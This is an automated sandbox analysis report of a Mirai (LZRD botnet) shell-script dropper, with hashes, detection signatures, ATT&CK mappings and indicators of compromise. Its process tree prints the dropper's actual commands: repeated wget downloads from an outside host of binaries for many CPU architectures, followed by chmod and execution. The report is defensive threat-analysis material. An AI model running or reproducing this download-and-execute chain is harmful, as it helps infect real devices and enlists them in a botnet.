mirai | 27304700dc53d71505aa6d32165fe6142f3e6173effcd08a84255a3eae40788e

Analysis

max time kernel
152s
max time network
153s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
30-04-2023 13:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

D.sh
Size

1KB
MD5

e41b9523a8373b79498bef2473723adf
SHA1

bd468f9718ef86d34c88552dd01464f85e8e2ee5
SHA256

27304700dc53d71505aa6d32165fe6142f3e6173effcd08a84255a3eae40788e
SHA512

0b933fcf0f8a24ffd62431f47469529fce2170307777a632d74af893902af3ba60a14076a74874354c7667b39e5ebf37a2f6f1e9d145599d22c2fbbb03f31476

Score

10^/10

mirai lzrd botnet upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Modifies the Watchdog daemon 1 TTPs
Malware like Mirai modify the Watchdog to prevent it restarting an infected system.

Impair Defenses
T1562
Writes file to system bin folder 1 TTPs 2 IoCs

Hijack Execution Flow
T1574

Processes:

description ioc

File opened for modification /sbin/watchdog
File opened for modification /bin/watchdog
Executes dropped EXE 13 IoCs

Processes:

wgetBTchmodwgetBT

pid process

580 wget
592 BT
600 chmod
608 wget
616 BT
624
632
640
648
656
664
672
680

description	ioc
File opened for modification	/sbin/watchdog
File opened for modification	/bin/watchdog

pid	process
580	wget
592	BT
600	chmod
608	wget
616	BT
624
632
640
648
656
664
672
680

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
/tmp/x86	upx
/tmp/BT	upx
/tmp/mips	upx
/tmp/x86_64	upx
/tmp/mpsl	upx
/tmp/arm	upx
/tmp/arm5	upx
/tmp/arm6	upx
/tmp/arm7	upx
/tmp/ppc	upx

Reads runtime system information 35 IoCs

Reads data from /proc virtual filesystem.

Processes:

description	ioc
File opened for reading	/proc/593/cmdline
File opened for reading	/proc/625/cmdline
File opened for reading	/proc/635/cmdline
File opened for reading	/proc/673/cmdline
File opened for reading	/proc/571/cmdline
File opened for reading	/proc/633/cmdline
File opened for reading	/proc/643/cmdline
File opened for reading	/proc/689/cmdline
File opened for reading	/proc/627/cmdline
File opened for reading	/proc/583/cmdline
File opened for reading	/proc/641/cmdline
File opened for reading	/proc/422/cmdline
File opened for reading	/proc/573/cmdline
File opened for reading	/proc/617/cmdline
File opened for reading	/proc/681/cmdline
File opened for reading	/proc/541/cmdline
File opened for reading	/proc/603/cmdline
File opened for reading	/proc/665/cmdline
File opened for reading	/proc/675/cmdline
File opened for reading	/proc/601/cmdline
File opened for reading	/proc/683/cmdline
File opened for reading	/proc/581/cmdline
File opened for reading	/proc/649/cmdline
File opened for reading	/proc/572/cmdline
File opened for reading	/proc/611/cmdline
File opened for reading	/proc/651/cmdline
File opened for reading	/proc/657/cmdline
File opened for reading	/proc/659/cmdline
File opened for reading	/proc/667/cmdline
File opened for reading	/proc/688/cmdline
File opened for reading	/proc/570/cmdline
File opened for reading	/proc/595/cmdline
File opened for reading	/proc/609/cmdline
File opened for reading	/proc/619/cmdline
File opened for reading	/proc/585/cmdline

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwget

description	ioc	process
File opened for modification	/tmp/x86_64	wget
File opened for modification	/tmp/arm	wget
File opened for modification	/tmp/arm5	wget
File opened for modification	/tmp/arm7	wget
File opened for modification	/tmp/sh4	wget
File opened for modification	/tmp/x86	wget
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/arm6	wget
File opened for modification	/tmp/ppc	wget
File opened for modification	/tmp/spc	wget
File opened for modification	/tmp/m68k	wget
File opened for modification	/tmp/BT
File opened for modification	/tmp/mpsl	wget

/tmp/D.sh
/tmp/D.sh
1⤵
PID:575

wget
wget http://ping.999apk.top/x86
2⤵
- Writes file to tmp directory
PID:576

cat
cat x86
2⤵
PID:578

chmod
chmod +x BT D.sh systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86
2⤵
PID:579

./BT
./BT
2⤵
PID:580

wget
wget http://ping.999apk.top/mips
2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:584

chmod
chmod +x BT D.sh mips systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86
2⤵
PID:591

./BT
./BT
2⤵
PID:592

wget
wget http://ping.999apk.top/arc
2⤵
PID:596

chmod
chmod +x BT D.sh mips systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86
2⤵
PID:599

./BT
./BT
2⤵
PID:600

wget
wget http://ping.999apk.top/x86_64
2⤵
- Writes file to tmp directory
PID:604

chmod
chmod +x BT D.sh mips systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86 x86_64
2⤵
PID:607

./BT
./BT
2⤵
- Executes dropped EXE
PID:608

wget
wget http://ping.999apk.top/mpsl
2⤵
- Writes file to tmp directory
PID:612

chmod
chmod +x BT D.sh mips mpsl systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86 x86_64
2⤵
PID:615

./BT
./BT
2⤵
PID:616

wget
wget http://ping.999apk.top/arm
2⤵
- Writes file to tmp directory
PID:620

chmod
chmod +x arm BT D.sh mips mpsl systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86 x86_64
2⤵
PID:623

./BT
./BT
2⤵
PID:624

wget
wget http://ping.999apk.top/arm5
2⤵
- Writes file to tmp directory
PID:628

chmod
chmod +x arm arm5 BT D.sh mips mpsl systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86 x86_64
2⤵
- Executes dropped EXE
PID:631

./BT
./BT
2⤵
PID:632

wget
wget http://ping.999apk.top/arm6
2⤵
- Writes file to tmp directory
PID:636

chmod
chmod +x arm arm5 arm6 BT D.sh mips mpsl systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86 x86_64
2⤵
PID:639

./BT
./BT
2⤵
PID:640

wget
wget http://ping.999apk.top/arm7
2⤵
- Writes file to tmp directory
PID:644

chmod
chmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86 x86_64
2⤵
PID:647

./BT
./BT
2⤵
PID:648

wget
wget http://ping.999apk.top/ppc
2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:652

chmod
chmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl ppc systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86 x86_64
2⤵
PID:655

./BT
./BT
2⤵
PID:656

wget
wget http://ping.999apk.top/spc
2⤵
- Writes file to tmp directory
PID:660

chmod
chmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl ppc spc systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86 x86_64
2⤵
PID:663

./BT
./BT
2⤵
PID:664

wget
wget http://ping.999apk.top/m68k
2⤵
- Writes file to tmp directory
PID:668

chmod
chmod +x arm arm5 arm6 arm7 BT D.sh m68k mips mpsl ppc spc systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86 x86_64
2⤵
PID:671

./BT
./BT
2⤵
- Executes dropped EXE
PID:672

wget
wget http://ping.999apk.top/sh4
2⤵
- Writes file to tmp directory
PID:676

chmod
chmod +x arm arm5 arm6 arm7 BT D.sh m68k mips mpsl ppc sh4 spc systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timedated.service-1QszPw systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y x86 x86_64
2⤵
PID:679

./BT
./BT
2⤵
PID:680

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hijack Execution Flow

T1574

Privilege Escalation

Hijack Execution Flow

T1574

Defense Evasion

Impair Defenses

T1562

Hijack Execution Flow

T1574

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/BT
Filesize
20KB

MD5
9ec34b55333c129649743dcbd42e4256

SHA1
da9072bba9e8a239356d51a1fcf9418de30a86d0

SHA256
fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7

SHA512
d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42

Download Submit
/tmp/arm
Filesize
21KB

MD5
0cb2516e0c4665363644396499cb7aec

SHA1
995fc2ab54085422d82676b252a2bab06cdf5704

SHA256
7113f3bdb51dda7364409aa36dc551117c2ac0468f97ab48354a8cc71f8ba6d1

SHA512
d6a4282960ce9735914b4e7fbff860865d10f66a5559cd50f3e02fc2037a895fbd053c64ed8926e43cf35502bc016e7a0c928925d03286c046f534da4dc10d88

Download Submit
/tmp/arm5
Filesize
18KB

MD5
0e6fe9b5313bd0deaffb51f2fbbe06cb

SHA1
6facd101542faf57dab7824909e0c3d29513da60

SHA256
3ee59d8e2e63a5a183dd8eb8ba938dbbcc58a04db4f29765c119403a0aae3863

SHA512
43fccf08a10d34d7563deaff7b52f3562b5dd834e22f03c28861476be3470ed5921e56dfab0c2822ad34bb8bffbe4f81ed2af35bb87f767c533444dd83a9756e

Download Submit
/tmp/arm6
Filesize
26KB

MD5
67110fddb816519a3d5d352b5f32bbbb

SHA1
6a541fce786c16301901087977b30476920e3382

SHA256
14acc984b234291e48d24fdbc014b3a618aefb2b4ff446260b0be99c1623a9e6

SHA512
f333ca1d2c43e5172f914574c75b08c07e908bc9e97bca766fdf4f170af98cdffa00d7b38fe99bbef16b0f2a71ead664076eb726e9226c76b8b8c9454ee11c35

Download Submit
/tmp/arm7
Filesize
45KB

MD5
db3001dc744f15e5dfd694e26b57979c

SHA1
9fde5950b212a39e94e15ed3347cca61d514a95b

SHA256
076c9ddc2515d214a8160053f9d5a17899ecb21cf14d4185d10bb1c475b99d6e

SHA512
1d925012a6d5d6be1deef6647b62d0e78526a49e17fdf13ff96c7757c4f85ce28c44e1e0acd81034ca75875a5b8a65a0e852cfabb192c064e7d02642bfba8731

Download Submit
/tmp/m68k
Filesize
53KB

MD5
6fdd07c178e50ab399b8c76b2843f2f6

SHA1
2f5df889cb98984a913a1c24efb222492aa93c27

SHA256
f48d2353dd546d477e7befe5c2b59e861c425477cfa345f27f6a9d4c5ca8e070

SHA512
52224cb4f205020548e5430f310240d544f2eca1bd2ae0b2f4eac78195963d4836b2740bda292d696ef81ab2c053b85b6b6f38175e364394c3031bdb2df0ad8d

Download Submit
/tmp/mips
Filesize
23KB

MD5
5ffea0b004a955d227e947d486ab573f

SHA1
de6fe607474109e92373ed4b6f54cb678e69f04f

SHA256
472f3f6b0f4f2dbbe1af76ad64d0fed8df5e6e4921154dee7f594c031de1bb02

SHA512
93f545c480e20f3f52bc55d9748a77ee5e9a966a6ab1fa8192f72c1c7eff2e1ab6c2f31b74b40b6fd4ba144fb3fe41ad3dc450323d1ad5e2b6a8a64ee5ec641f

Download Submit
/tmp/mpsl
Filesize
24KB

MD5
d1d7efff7b9a9627879ceb1a79832a28

SHA1
5f88e33dec795ff429d2a44c7743d3bc948dcc19

SHA256
c36f13c7746fad54448f35fbe2f8bdaeba34af7b29f1d0f406edf2cbc3bbf21d

SHA512
301da978c8e006a61b6c37ac7a8ce00527fb292a82a97c2fac4483d5bab1fc2d3cbcb6a4a29f273465de2077e68d0e4263012c47b2a88cf290ee5e6fc962e53c

Download Submit
/tmp/ppc
Filesize
21KB

MD5
6260fc510dee1aef342de3bf2892bf7c

SHA1
4c5d1757ef56a3c4578f7db2949800b0a8b08005

SHA256
f9e0997c9e8db0a897c90de5ae067fcff27ff10a39f65b5e3928eb0db2c909e4

SHA512
b5bbcabe0e87ceb49cf1340b2c930f5ddc1f70904110717178130f14527520d7ca0f35db8176f75c0b6b32d0a1092830ec77dc618e3d5c17810362fc96c61c72

Download Submit
/tmp/sh4
Filesize
48KB

MD5
df45048f800e71326852acbdd078a3ae

SHA1
5377821189664f7cc467f640c51b58841f8d9bf3

SHA256
e0906b20d81f27308654f5ba1a68865c752881b530ebcfeb76d0651038753b8c

SHA512
352a43d623da15e498ed0489a79db0c1b53f7ad3a8e7c0bddcb63df7d90f16a27893e0152d5283a695c9fa78c06bb2b54e9bc1abb88c6b00a16a7eeb97768d4d

Download Submit
/tmp/spc
Filesize
57KB

MD5
bebd6bb6e9ba158796f9ec38b0bb6d61

SHA1
c28caab155d866d7223b6f09e43f0d9176344c8c

SHA256
b9feac2aba1c7fef005f5992c7d3dc15d1564ccdc8aa3d833d7fe76d46a13e5a

SHA512
b21b5604279d00acc7e86950f72bc79f32d3b65bad69ae49977acf606c9b1539b1ae78d001a5a4e1529e6258e19079f8858ea3539bd2d004c74918e909d9ea56

Download Submit
/tmp/x86
Filesize
20KB

MD5
9ec34b55333c129649743dcbd42e4256

SHA1
da9072bba9e8a239356d51a1fcf9418de30a86d0

SHA256
fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7

SHA512
d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42

Download Submit
/tmp/x86_64
Filesize
20KB

MD5
9ec34b55333c129649743dcbd42e4256

SHA1
da9072bba9e8a239356d51a1fcf9418de30a86d0

SHA256
fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7

SHA512
d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42

Download Submit
memory/580-1-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/592-2-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/600-3-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/608-4-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/616-5-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/624-6-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/632-7-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/640-8-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/648-9-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/656-10-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/664-11-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/672-12-0x0000000008048000-0x00000000080547a0-memory.dmp

Download
memory/680-13-0x0000000008048000-0x00000000080547a0-memory.dmp

Download